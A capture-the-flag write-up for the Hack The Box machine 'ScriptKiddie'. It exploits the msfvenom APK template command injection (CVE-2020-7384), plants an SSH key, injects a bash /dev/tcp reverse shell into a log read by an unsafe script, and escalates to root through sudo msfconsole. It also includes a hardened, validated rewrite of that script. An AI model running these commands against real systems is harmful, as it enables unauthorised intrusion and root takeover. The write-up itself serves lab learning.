
HTB ScriptKiddie Writeup

INFO

Machine IP = 10.10.10.226
OS = Linux
Level = EASY
Points = 20

Write the IP of the machine to your /etc/hosts file

```
echo "10.10.10.226 scriptkiddie.htb" >> /etc/hosts
```

Scanning

```
nmap -sC -sV 10.10.10.226
```

Enumeration

Nmap:

```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
```

The page has an msfvenom upload tab, which accepts a template file. A Google search for an msfvenom template upload vulnerability turned up CVE-2020-7384 (command injection through the APK template); a GitHub page carried a PoC, so I cloned the code and ran the program, which produced an APK file.

https://www.exploit-db.com/exploits/49491

Or

https://www.rapid7.com/db/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection/

```
msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST <Your IP Address>
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run

[+] msf.apk stored at /home/kali/.msf4/local/msf.apk
```

Start a listener on the port the module was configured with:

```
nc -lnvp 4444
```

Then upload the APK to the site, set the IP field to 127.0.0.1 (any IP address works) and choose Android; the listener receives a reverse shell:

```
listening on [any] 4444 ...
connect to [10.10.15.26] from (UNKNOWN) [10.10.10.226] 38492
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
```

Also, you can do these steps to get an SSH session instead:

  • Get id_rsa.pub from your VM or PC
  • On the reverse shell, add your public key (id_rsa.pub) to the kid user's authorized_keys:

    ```
    echo "ssh-rsa ****=" >> ~/.ssh/authorized_keys
    ```

    Then do ssh, or upgrade the reverse shell to a tty and read the user flag:

    ```
    python3 -c 'import pty; pty.spawn("/bin/bash")'
    kid@scriptkiddie:~/html$ cd ~
    kid@scriptkiddie:~$ ls
    html logs snap user.txt
    kid@scriptkiddie:~$ cat user.txt
    ```

Let's enumerate the logs folder:

- The logs folder has only a `hackers` file, and it's empty
- The home directory has two users (kid and pwn); `/etc/passwd` also lists root

In /home/pwn there is a scanlosers.sh file with the following code:

```
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
# Field 3 onward of every log line is interpolated, unquoted, into a sh -c string:
# whatever is written to the hackers file is executed as the pwn user.
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
```
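The script above trusts the log content and hands it to `sh -c`, which is the weakness the next steps use. As an added example (not the box's script), here is a hardened POSIX sh rewrite of the same job that accepts only well-formed IPv4 addresses and passes each one to nmap as a separate argument instead of interpolating it into a command string. The sample log lines are constructed, and the optional second parameter of `scan_target` exists only so the function can be exercised without nmap installed.

```shell
#!/bin/sh
# Hardened rewrite of the scanlosers.sh pattern (added example, not the box's
# script). The log layout (third field onward = IP) follows the original cut.

is_ipv4() {
    # Reject anything that is not digits and dots (so shell metacharacters,
    # spaces and quotes never reach a command line) or is badly dotted.
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        # each octet: 1-3 digits, no leading zero, value at most 255
        case $octet in ''|0?*|????*) return 1 ;; esac
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Print the unique, valid targets from a log file; invalid entries are
# dropped instead of being handed to the shell.
valid_targets() {
    cut -d' ' -f3- "$1" | sort -u | while IFS= read -r ip; do
        if is_ipv4 "$ip"; then printf '%s\n' "$ip"; fi
    done
}

# Run the scan with the IP as its own argv element (no sh -c string).
# The second parameter only exists so the function can be tested without nmap.
scan_target() {
    "${2:-nmap}" --top-ports 10 -oN "recon/$1.nmap" "$1"
}

# Constructed sample log: two good entries, one bad octet, one injection attempt.
SAMPLE_LOG=$(mktemp)
printf '%s\n' \
    '2021-02-03 19:47:01 10.10.10.226' \
    '2021-02-03 19:48:12 256.1.1.1' \
    '2021-02-03 19:49:00 1.2.3.4;id' \
    '2021-02-03 19:50:33 10.10.14.5' > "$SAMPLE_LOG"

# Usage on a real host (one background nmap per validated target):
# valid_targets "$SAMPLE_LOG" | while IFS= read -r ip; do scan_target "$ip" & done
```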

Go to the logs folder and run a reverse shell through the following code:

```
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.26/8181 0>&1' #" >> hackers
```

And run a netcat listener:

```
nc -lnvp 8181
```

On the reverse shell (now running as pwn), run this; msfconsole is started through sudo, so the shell it spawns runs as root:

```
sudo msfconsole

msf6 > /bin/bash
stty: 'standard input': Inappropriate ioctl for device
[*] exec: /bin/bash

cat /root/root.txt
```

Done!



This post is licensed under CC BY 4.0 by the author.